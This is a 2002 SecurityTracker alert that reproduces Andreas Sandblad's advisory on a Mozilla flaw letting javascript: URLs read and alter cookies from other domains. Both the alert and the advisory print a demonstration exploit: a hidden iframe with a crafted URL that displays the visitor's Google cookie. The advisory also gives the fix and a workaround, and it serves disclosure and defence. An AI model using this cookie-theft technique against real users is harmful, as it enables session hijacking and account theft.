Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
|
|
|
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
|
|
|
|
|
|
|
|
|
|
|
Mozilla Web Browser Allows Javascript Code to Read and Modify Cookies from Other Domains
|
|
SecurityTracker Alert ID: 1004839 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jul 25 2002
|
Impact: Disclosure of authentication information, Disclosure of system information, Modification of authentication information, Modification of system information
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): Prior to 1.1 Beta (July 22, 2002)
|
Description: An information disclosure vulnerability was reported in the Mozilla browser. A remote user can create code that, when run on a target user's Mozilla browser, will be able to read other cookies from the browser.
It is reported that a remote user can create a specially crafted javascript URL that, when loaded by a target user's Mozilla browser,
will be able to access and modify cookies on the browser belonging to different domains. A javascript URL of the following format
can apparently be used:
javascript://[host]/[path]\n[code to read cookie]
According to the report, the '//' string will ensure
that the host and path combination doesn't generate any javascript error messages.
A demonstration exploit is provided below.
To activate the exploit, load the HTML code onto a remote web server and then load the code in the Mozilla browser.
<pre>
Title:
Mozilla cookie stealing/spoofing
Date: [2002-07-24]
Impact: Steal/spoof arbitrary cookie _ _
using javascript: URLs o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO-
-(_)--Ooo---
This demo will display your google cookie (must exist).
</pre>
<body onload=init()>
<iframe name=f height=0 width=0
style=visibility:hidden></iframe>
<script>
function init(){
f.location = "javascript://www.google.com/\n"+
"'<body onload=alert(document.cookie)>'";
}
</scrip
t>
|
Impact: A remote user may be able to create HTML that, when loaded, can access cookies on the Mozilla browser from other domains.
|
Solution: According to the report, this problem has been fixed in Mozilla 1.1 Beta, released 02-07-22 and available at:
http://www.mozilla.org/
|
Vendor URL: www.mozilla.org/ (Links to External Site)
|
Cause: Access control error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Andreas Sandblad <sandblad@acc.umu.se>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 24 Jul 2002 16:45:59 +0200 (CEST)
From: Andreas Sandblad <sandblad@acc.umu.se>
Subject: Mozilla cookie stealing - Sandblad advisory #9
|
- Sandblad advisory #9 -
---..---..---..---..---..---..---..---..---..---..---..---..----
Title: Steal/spoof arbitrary cookie in Mozilla
Date: [2002-07-24]
Software: Mozilla
Vendor: http://www.mozilla.org
Fix: The author has been working with Mozilla
to produce a patch. Problem is fixed in
Mozilla 1.1 Beta released 02-07-22.
Workaround: Preferences->Advanced->Scripts & Plugins->
Disable access to cookies using javascript
Impact: Steal/spoof arbitrary cookie _ _
using javascript: URLs o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
BACKGROUND:
===========
I orginally thought this was a XSS (cross site scripting) issue, but soon
came to the conclusion that it is limited to a design error in restricting
access to cookies. Even though Mozilla is open source, I have not been
studying the source code in order to find and exploit the vulnerability.
In the beginning I had problems not generating any javascript errors when
using the javascript URL. My first solution was to make the host and path
to be a valid javascript expression. Google.com may be a valid expression
if google is an object and com is an element/variable of the Google
object. Further on if Google.com is an int, it is legal to use google.com/
1. Parsing of host and path will stop when a space is found.
Well, I soon found a much easier solution. Simply put a // in front of the
host and path and a \n before the cookie reading code accour. The reason
why I didn't find this directly was because the newline must be created in
a javascript function. It can't be set directly in a javascript url.
DESCRIPTION:
============
Mozilla allows script in the javascript protocoll to set and read cookies.
For javascript URLs the host and path for the cookie is pulled out as:
"javascript:[host][path]"
Cookie security is based only on restricting access to correct matching
host and path. By carefully crafting a mallicious javascript URL opened in
a new frame/iframe/window, it is possible to access and alter cookies from
other domains.
DETAILS:
========
The easiest way to exploit the vulnerability is to simply create a
javascript URL in a javascript function as:
javascript://[host]/[path]\n[code to read cookie]
The // will make sure host and path don't generate any javascript errors.
EXPLOIT:
========
Instructions:
Put the exploit in a html document on a remote server and load it with
your Mozilla browser to activate the exploit.
-------------------------- CUT HERE ----------------------------
<pre>
Title: Mozilla cookie stealing/spoofing
Date: [2002-07-24]
Impact: Steal/spoof arbitrary cookie _ _
using javascript: URLs o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
This demo will display your google cookie (must exist).
</pre>
<body onload=init()>
<iframe name=f height=0 width=0 style=visibility:hidden></iframe>
<script>
function init(){
f.location = "javascript://www.google.com/\n"+
"'<body onload=alert(document.cookie)>'";
</script>
-------------------------- CUT HERE ----------------------------
Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.
Old advisories:
===============
#8 [2002-07-23] "Pressing CTRL in IE is dangerous"
http://online.securityfocus.com/archive/1/283866
#7 [2002-05-19] "IE dot bug"
http://online.securityfocus.com/archive/1/273168
#6 [2002-05-15] "Opera javascript protocoll vulnerability"
http://online.securityfocus.com/archive/1/272583
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561
Greetings:
==========
For feedback concerning this issue:
Ingesson, Quitta, Hawkan.
For feedback I forgot to thank for, regarding last advisory:
Tys0n-
Feedback:
=========
Please send suggestions and comments to: _ _
sandblad@acc.umu.se o' \,=./ `o
(o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad,
student in Engineering Physics at Umea University, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--
|
|
Go to the Top of This SecurityTracker Archive Page
|
